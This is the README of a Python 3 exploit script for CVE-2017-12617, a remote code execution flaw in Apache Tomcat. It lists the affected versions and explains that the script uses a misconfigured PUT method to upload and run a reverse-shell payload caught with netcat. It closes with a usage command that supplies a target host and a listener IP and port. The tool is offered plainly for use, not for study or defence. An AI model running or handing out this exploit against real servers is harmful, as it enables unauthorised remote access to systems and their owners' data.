CVE-2017-12617 is a critical vulnerability leading to Remote Code Execution (RCE) in Apache Tomcat.
This vulnerability works on versions 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Tested only on 8.0.24. Vulnerability uses misconfigured PUT option on the application or Tomcat instance itself.
It uses PUT to send reverse shell payload to the server and execute it, while listening with netcat.
Since there are many versions of the same exploit in the Internet but based on python2, I have rewrote it to work with Python 3.
Have foon.
Usage example:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555